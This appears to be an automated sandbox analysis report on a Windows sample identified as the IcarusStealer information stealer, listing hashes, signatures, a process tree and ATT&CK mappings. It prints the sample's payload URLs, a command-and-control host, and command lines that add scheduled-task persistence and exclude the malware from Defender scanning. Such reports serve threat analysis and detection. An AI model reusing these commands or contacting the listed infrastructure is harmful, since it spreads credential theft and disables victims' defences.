Analysis
-
max time kernel
299s -
max time network
296s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
-
submitted
09/03/2024, 05:50
General
-
Target
custom1.exe
-
Size
24.9MB
-
MD5
4e1c29f0c1af62ddea916c6b80548c76
-
SHA1
38d9f15356b6a65f4e76ee739867d55b01493793
-
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
-
SHA512
f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
-
SSDEEP
49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Executes dropped EXE 6 IoCs
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 22 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 29 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 20 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\custom1.exe"C:\Users\Admin\AppData\Local\Temp\custom1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp801D.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\CatRoot\$SXR\$SXR.exe"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\switched.exe"C:\Users\Admin\AppData\Local\Temp\switched.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD55⤵
-
-
C:\Windows\system32\find.exefind /i /v "md5"5⤵
-
-
C:\Windows\system32\find.exefind /i /v "certutil"5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tesetey.exe"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rfr0c532\rfr0c532.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A04.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5764DFC4518F488F8DA385BC91459B4C.TMP"5⤵
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Start.exeC:\Users\Admin\AppData\Local\Temp\Start.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "C:\Users\Admin\Desktop\UpdateExport.xltx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11.2MB
MD5640b63dc6cb558aa57861823e499c84c
SHA12dada6d5a8596a5cae99ef070c2a95d7eafab68c
SHA256abf34c91661363001bd58bf2eb5eb67ef0b01b0c885e514e9534f1abb6600ede
SHA512241189cce47f2142d2cf3ce3df8d295f7d07ab49c82b572091bcae7cece23664ee3868705509a6e93cf903d80523415097859614e9cb1774c0fea97a6645a4ad
-
Filesize
9.5MB
MD592bd1648b9766dc21db3af08f74e9c13
SHA17bba04af82436f46312d36118dfacd98055316ff
SHA256ab88e14100e7ab0ec67f84d03e690096f6c889f8fb7856b9288d2c33c560f260
SHA512fcb53c1adf61d9827e6b72893b86d9b0444108eeb8d324943a7158d694b39b234bfe34dfe37d3be0ab70f3e9eb97ced823a94c0ee866ff6eb8bb772c9ba64bdc
-
Filesize
1KB
MD588292a8b8e7452ba7c3e1da8fc7fee12
SHA1207373531e043dacdd5d0358c75a254ac1818890
SHA25645ef0548d659ca10557e537ee582ccb65c72ed14421e6ae93370dc6d378b7c13
SHA5128cacaad92da7289e24427b234d1bec1ef1780b9dfbe96039f6e2aac8632b0af136eec810f649f77ca7d870212ec4be2e962633e68252d55794571508bb3ee1a6
-
Filesize
4KB
MD50a81084b51844ba55c5f351e86d87318
SHA1a68ce03381fece99b951c2194ef3a2e03b2d2e8e
SHA256afb3b56b9f847237adf2eb6bce0b75d86e9be4ea89a1264495f67a44cd3f2c63
SHA512c04f150b48741c380d14042da95ce623aeec857c5bd2c2921b4ab8f638be3f07bab026fd1c925e7487c3d03e1a7cb83dd22ded76c7031b6b8227d1a304c13324
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
1.6MB
MD53e359df762ce2cca4fa21b0aa438b532
SHA1cd3a11ed9cfb6c4a1f6b29ffb4d4855372c5378e
SHA256c72a672ead28482da2e06879b26a6a018a054f0e52f9b015adac64380d6e30c5
SHA512a636c71adb2865d4f62fecd9942f8792a22dc623930f6d1db742be48607d44a30ff445f92708a026cc7820f93d4abd6f65dc5187c17a3ac39c9909ba050e8364
-
Filesize
2.3MB
MD5cf49683c09cde9151b8cfcb98b72c3b4
SHA13fe6311f2477ab161d68ac66742bf2fa51a65bdd
SHA256a78c14ad10db929eb572be7f5c58884fcf7455fc567151447f1cd764cab3c803
SHA512dd8af67f07d4ac634d9619bbf19810f81f7f7d0003179bced3530b700039254867533bcd1b4f208342efd13df7244ddd3b1af01aa1e91fe9bceb0f6623d429d2
-
Filesize
3.7MB
MD5b9bbe31d276de5c3d05352d070ae4244
SHA15e1bb67b01c579b4e0ad5a7475ceb657201c27ec
SHA256a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
SHA5120a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17
-
Filesize
494KB
MD50f0838bc6642dd6bc603368e50b4aba3
SHA1932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA2564acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860
-
Filesize
150B
MD5a150bcde0f137f131d527f1b65250e35
SHA139959fb7861f42962f51db7db38239a2bb619024
SHA2568657cc1a2adf99aa4fc9130da2341b40002652f7b0d16ab736b2b0397df4f0ac
SHA5129434aa8d2599ff40ab3ddb6833550e0338f3b871d9765a2c249c2b668ac917da16f4312000a8a9c83e3724bd0435c47ef7a2891f0afe8d812a49caa31ec47b93
-
Filesize
4.0MB
MD5110719d43a46f29582bca2cc62a94d9f
SHA1ca8a3c91099e1ce4c68ad2d4eef8d667f31b579d
SHA256672d616f57f1772887412712668380eb49cb1b8856b8ced6ffa1be823b8b2143
SHA51299c089928272dd5a5d024a28ba4b346c95331d646614b68d257b1669b9e5ae8c658d6822cfc603b726f3a556fa34cecad1154724f4f3c763215a89b15af9790e
-
Filesize
5.0MB
MD5649930326dfd2b14ad5a5cb11c56d22f
SHA1cc5a2097f2b1921e696e7209df84005f01d949df
SHA256bb2882a48c632367090daa105a45801c03426ec9de322f05ba7001a2d4c22536
SHA512eeda0facc757ce1c174bc4781466c9289cca18582d44628785d080e006ca82f0cc24b2138ee3f0f2711387e153589f36b5e5f76260c0adabeca61121d9c74701
-
Filesize
4.7MB
MD5cb38389f5500ed343fd2bebbb65a31e8
SHA16b336c5db86522b00d0f1812a8075f44ae6cfc1d
SHA256db909770623b8ad2d72120ed00649ca2a145c8032ba913da0c98bb907012e972
SHA512b9b3d07814372bbf09b8cf11de0919c128e720305227e8016f4aea2e01170ece18c535899f32a63aba1f13fac1165f4dcd45a594e69e4323e5e0c3b34b2dcb0d
-
Filesize
58B
MD579668a6729f0f219835c62c9e43b7927
SHA10cbbc7cc8dbd27923b18285960640f3dad96d146
SHA2566f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3
-
Filesize
1KB
MD5810535a8ae563d6aa53635a1bb1206ff
SHA1f5ba39f1a455eb61efe5022b524892249ee75dce
SHA2567f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f
SHA5125662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
447B
MD558a91fe9096d7ad0c1caf92a0d2f25da
SHA14bdfa684537e294271d5c1db9540b12cccd56dc0
SHA256d9623456ccc31c5d1de32547dd972286212df9155791fd6ad33bb543b1b14740
SHA51219938ab6598cb3d1ff590f0e5a56f7545d160f28b76d400a7967ad8e299e3570a30146b652d17b7215ed429726509e2be1b8dfbf1eaa4f7749fcdbd89faf6eae
-
Filesize
64KB
-
Filesize
9.9MB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
9.9MB
-
Filesize
144KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
6.2MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1.9MB
-
Filesize
64KB
-
Filesize
696KB
-
Filesize
696KB
-
Filesize
64KB
-
Filesize
1.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
696KB
-
Filesize
64KB
-
Filesize
1.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
472KB
-
Filesize
216KB
-
Filesize
64KB
-
Filesize
660KB
-
Filesize
120KB
-
Filesize
204KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
300KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
300KB
-
Filesize
592KB
-
Filesize
64KB
-
Filesize
112KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
6.2MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
624KB
-
Filesize
6.9MB
-
Filesize
5.0MB
-
Filesize
64KB
-
Filesize
584KB
-
Filesize
6.9MB
-
Filesize
520KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4.2MB
-
Filesize
4.2MB
-
Filesize
4.2MB